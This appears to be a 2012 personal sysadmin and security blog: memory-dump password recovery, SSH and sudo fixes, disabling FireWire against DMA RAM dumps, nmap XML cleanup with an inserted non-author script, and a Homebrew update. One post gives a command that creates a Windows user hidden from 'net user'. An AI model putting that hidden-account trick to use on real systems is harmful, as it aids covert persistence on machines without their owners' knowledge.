I was able to dump the contents to disk and open the dump in a hex editor to look for the portion that had the password. I found the password like I expected to, and I'm glad it isn't THAT awful a password like I feared.

Thursday, March 15, 2012

sudo: unable to resolve host loldongs

Apparently if you just change the hostname in /etc/hostname, sudo starts crying that it can't resolve the new hostname.

It looks like you can just add an entry in /etc/hosts for your new hostname that points to yourself, and then it gracefully shuts the fuck up.


SSH2_MSG_KEXINIT and ssh connections dropping

For some reason ssh was just choking when I was trying to connect to my BT5 install. ssh -vv would show the connection being reset. It turns out that the server didn't have the proper host keys installed by default.

Running sshd-generate fixed the issue; everything worked afterwards.

Bash trivia trick

If you want to feel smarter than someone else, try this little trick.

Challenge the other person to create a file on the filesystem by sending the shell only 3 characters.

Answer? super simple:


1: >
2: a
3: 'new-line'

Now if you do an 'ls' you can see that the empty file 'a' was created in the current directory. This is a short way to create an empty file on the local system. What is happening is that you are redirecting nothing into a file; since that file didn't exist previously, the redirection created it, hence an empty file.

Now you can reserve 'touch' for more fancy trickery (timestomping)

Friday, March 9, 2012

Disable FireWire completely on Mac

Using inception, it's super easy to dump a Mac's RAM through the DMA feature of FireWire. This includes plaintext login passwords. I tried it, I saw my password, I wept.

Next step? obliterate firewire.

First step, move the FireWire kext folder to your home directory for a backup:

sudo mv /System/Library/Extensions/IOFireWireFamily.kext ~

then make a placeholder directory for kicks and fun

sudo mkdir /System/Library/Extensions/IOFireWireFamily.kext/

then boot the mac using a system disk to set an openfirmware password.

once you set the password, the attack kind of stops working.


Tuesday, February 21, 2012

Monday, January 30, 2012

Remove the Service fingerprint from nmap xml file

sed 's/ servicefp="[^"]*"//g' first-pn.xml > f.xml

This matches each servicefp attribute (the attribute name, its quotes and its value, plus the space before it) and replaces it with nothing, globally. The [^"]* stops at the attribute's closing quote, so any attributes that follow servicefp on the same line are left alone.
first-pn.xml is the source file, f.xml is the output
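The same stripping as a small script, added here as an example (not from the post), with the greedy `servicefp=.*" ` pattern kept beside it to show why the character class matters. SAMPLE is a constructed <service> line in the shape nmap writes, not real scanner output.

```shell
#!/bin/sh
# Added example, not from the post: strip servicefp="..." from nmap XML and
# compare a quote-bounded pattern with a greedy one. SAMPLE is constructed.

# Safe version: remove each servicefp attribute (and the space before it) only.
strip_servicefp() {
    sed 's/ servicefp="[^"]*"//g'
}

# Greedy version: `.*" ` runs to the LAST quote-space on the line, so it also
# deletes whatever attributes follow servicefp (method=, conf=, ...).
strip_servicefp_greedy() {
    sed 's/servicefp=.*" //g'
}

# Constructed sample line (nmap escapes quotes inside the value as &quot;).
SAMPLE='<service name="http" product="Apache httpd" servicefp="SF-Port80-TCP:V=6.01%I=7%D=1/30%r(GetRequest,1F,&quot;HTTP/1\.1\x20200\x20OK&quot;);" method="probed" conf="10"/>'

# Usage: ./strip-servicefp.sh first-pn.xml > f.xml   (or "demo" to compare)
if [ "${1:-}" = "demo" ]; then
    printf 'safe:   %s\n' "$(printf '%s\n' "$SAMPLE" | strip_servicefp)"
    printf 'greedy: %s\n' "$(printf '%s\n' "$SAMPLE" | strip_servicefp_greedy)"
elif [ -n "${1:-}" ]; then
    strip_servicefp < "$1"
fi
```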

Monday, January 23, 2012

Hide users from net user

Cute, apparently you can hide users from the output of "net user" by appending a $ to the name. It still shows up if you look for it explicitly or if you go to control panel.

net user cats$ lolwutcats? /add

Tuesday, January 10, 2012

Homebrew and pianobar

PromyLOPh pushed a patch today to fix pianobar so it would be compatible with a recent protocol change. Apparently Pandora has changed from using TLS to not using TLS... Well, that's all fine and great, but I use Homebrew for Mac to maintain my packages. I wanted my pianobar updated NAOW, so I started looking around...

-First I ran "locate pianobar" to get an idea of where the files were located.
-"/usr/local/Library/Formula/pianobar.rb" caught my eye, so I looked into it...
-The ruby file has a few entries in it, but towards the top is this code:
class Pianobar < Formula
url ''
version '2011.12.11'
homepage ''
md5 'c8573c133851ff54649d1ab45c7b855c'

-This obviously looks like where it tells Homebrew what to download and install. So what happens if I change those values to reflect the most current version?
-I opened the ruby file in vim and changed the settings:
class Pianobar < Formula
url ''
version '2012.01.10'
homepage ''
md5 'a703227c079cb0fe20ac4abbdfbc6f08'

-Saved, and ran "brew upgrade pianobar":

==> Upgrading pianobar
==> Downloading
######################################################################## 100.0%
==> make PREFIX=/usr/local/Cellar/pianobar/2012.01.10
==> make install PREFIX=/usr/local/Cellar/pianobar/2012.01.10
/usr/local/Cellar/pianobar/2012.01.10: 16 files, 176K, built in 3 seconds

-awwww yeahhhhh now i have my crack back in my spoon.